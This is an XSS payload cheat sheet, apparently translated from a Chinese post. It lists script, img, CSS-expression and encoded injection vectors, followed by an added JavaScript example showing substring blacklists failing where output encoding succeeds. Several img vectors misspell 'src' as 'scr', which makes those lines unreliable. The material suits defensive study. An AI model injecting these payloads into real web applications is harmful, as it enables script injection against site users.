<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the ???? is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
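From the defender's side, the comment-split, CSS-escape and HTML-entity variants in the list above are the reason substring blacklists fail while output encoding holds. The following is an added example, not part of the original post; the blacklist contents and all function names are assumptions made for illustration, and the sample vectors are copied from the list as written.

```javascript
// Constructed sample: vectors copied from the list above (typos included).
const VECTORS = [
  '<script>alert("跨站")</script>',
  '<img scr="#" onerror=alert(/跨站/)></img>',
  "<div style={left:expression (alert('xss'))}></div>",
  "<div style={left:exp/* */ression (alert('xss'))}></div>",
  "<div style={left:\\0065\\0078ression (alert('xss'))}></div>",
  "<div style={left:&#x0065;xpression (alert('xss'))}></div>",
  "<div style=\"{left:expRessioN (alert('xss'))}\">",
];

// Weak control (hypothetical): reject input containing known-bad substrings.
// Lower-casing defeats the mixed-case variant but nothing else.
const BLACKLIST = ['<script', 'javascript:', 'onerror', 'expression'];
function blockedByBlacklist(input) {
  const lower = input.toLowerCase();
  return BLACKLIST.some((needle) => lower.includes(needle));
}

// Strong control: encode on output. This mapping is for HTML text and
// quoted-attribute contexts only; style, script and URL contexts need
// their own encoding or an allow-list sanitizer.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vectors the blacklist lets through unchanged.
function missedByBlacklist(vectors) {
  return vectors.filter((v) => !blockedByBlacklist(v));
}

// True when no markup-significant character survives encoding.
function allInertAfterEscaping(vectors) {
  return vectors.every((v) => !/[<>"']/.test(escapeHtml(v)));
}

for (const v of missedByBlacklist(VECTORS)) {
  console.log('blacklist missed:', v, '=> encoded:', escapeHtml(v));
}
```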